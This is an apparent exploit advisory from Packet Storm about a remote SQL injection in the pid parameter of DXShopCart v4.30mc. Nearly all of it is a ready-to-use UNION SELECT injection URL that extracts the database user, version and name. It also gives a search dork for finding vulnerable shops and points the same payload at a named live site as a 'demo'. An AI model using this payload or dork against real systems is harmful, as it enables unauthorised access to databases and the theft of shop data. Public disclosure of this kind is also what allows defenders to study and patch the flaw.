DXShopCart version 4.30mc suffers from a remote SQL injection vulnerability.
27402ea99ba307371f220b241b8c397ea9dddbe9115ace8fd0c2b707e5e758a9###############################################################
DXShopCart V4.30mc(pid)Remote SQL Injection Vulnerability
###############################################################
# Author: Hussin X
# Home : www.tryag.cc/cc
# email : darkangel_g85[at]Yahoo[DoT]com
###############################################################
# script : http://scripts4profit.net/products.php?cid=19
# DorK : Powered by - DXShopCart v4.30mc
Exploit: 1
www.[target].com/Script/product_detail.php?cid=12&pid=-1+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16--
L!VE DEMO:
http://www.scripts4profit.net/ShopCartDX/product_detail.php?cid=12&pid=-1+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16--
Im IRAQi
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed